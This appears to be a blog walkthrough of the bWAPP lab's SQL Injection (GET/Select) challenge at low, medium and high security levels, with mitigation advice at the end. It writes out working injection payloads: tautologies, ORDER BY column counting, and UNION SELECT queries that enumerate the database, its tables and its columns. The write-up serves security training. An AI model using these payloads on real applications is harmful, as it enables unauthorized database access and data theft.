bWAPP - SQL Injection (GET/Select)

bWAPP – SQL Injection (GET/Select)

In this walk through, we will be going through the SQL Injection (GET/Select) vulnerability section from bWAPP Labs. We will be exploring and exploiting SQL Injection in GET request and select buttons and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.

SQL Injection (GET/Select)

Security: Low

  • Setting the security level to Low.

Security level Low

  • The application has a select functionality which is used to select movies as per the user’s wish and display information regarding that. As per the Burp intercept it issues a GET Request to sqli_2.php file which in turns displays the output from the DB.

SQL Injection (GET/Select)

Burpsuite intercept

  • I used the apostrophe (‘) at the end of the movie ID which causes an error. That’s good as it might be vulnerable to SQL injection.

'

payload

SQL Error

  • I used the below payload where i input an out of scope movie ID along with a TRUE statement and got a positive response.

999+OR+1=1--+-

payload

Select parameter

  • Next, i found the no. of columns using the below payloads. We will start by checking the no. of columns in the database. For that, we used ORDER BY clause, as we can see we hit an “Unknown column” error on column 8 but no error on column 7. That means, there are 7 columns in the DB.

1+ORDER+BY+10--+-
1+ORDER+BY+8--+-
1+ORDER+BY+7--+-

Order by Clause

payload

Number of columns confirmed

  • Let’s find out which column can be used to retrieve data. Here, the second data got reflected in the front end.

999+UNION+SELECT+NULL,"asd",NULL,NULL,NULL,NULL,NULL--+-

payload

Dumping data

  • Moving on, let’s dump the database name using the below payload.

999+UNION+SELECT+NULL,database(),NULL,NULL,NULL,NULL,NULL--+-

payload

Enumerate database

  • Now we have our database name “bWAPP”. Let’s find out the tables inside it using the below payload.

999+UNION+SELECT+NULL,table_name,NULL,NULL,NULL,NULL,NULL+from+information_schema.tables+where+table_schema=database()--+-

payload

Dump tables

  • We got a table named “blog”, nothing sensational but let’s still check the columns inside it with the below payload.

999+UNION+SELECT+NULL,column_name,NULL,NULL,NULL,NULL,NULL+from+information_schema.columns+where+table_name='blog'--+-

payload

Dump columns

  • Got an “id” column. On checking it, found nothing.

999+UNION+SELECT+NULL,id,NULL,NULL,NULL,NULL,NULL+from+blog--+-

No data found

Security: Medium

  • Setting the security level to Medium.

Security level Medium

  • I used the below payload and it worked in medium level too as we got a positive response.

9999+OR+1=1;

payload

SQL Injection

Security: High

  • Setting the security level to High.

Security level High

  • Unable to produce error in high level as the application is using prepared statements.

payload

SQL Injection

Also Read: bWAPP – SQL Injection (AJAX,JSON,jQuery)

Conclusion:

Conclusion

So, we finally completed all the security levels for the bWAPP SQL Injection (GET/Select) Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. Next, we can mitigate the potential SQL Injection attacks by performing input sanitization and using prepared statements or parametrized queries for every SQL query made by the application to the database. On that note, i will take your leave and will meet you in next one with another bWAPP vulnerability writeup, till then “Keep Hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top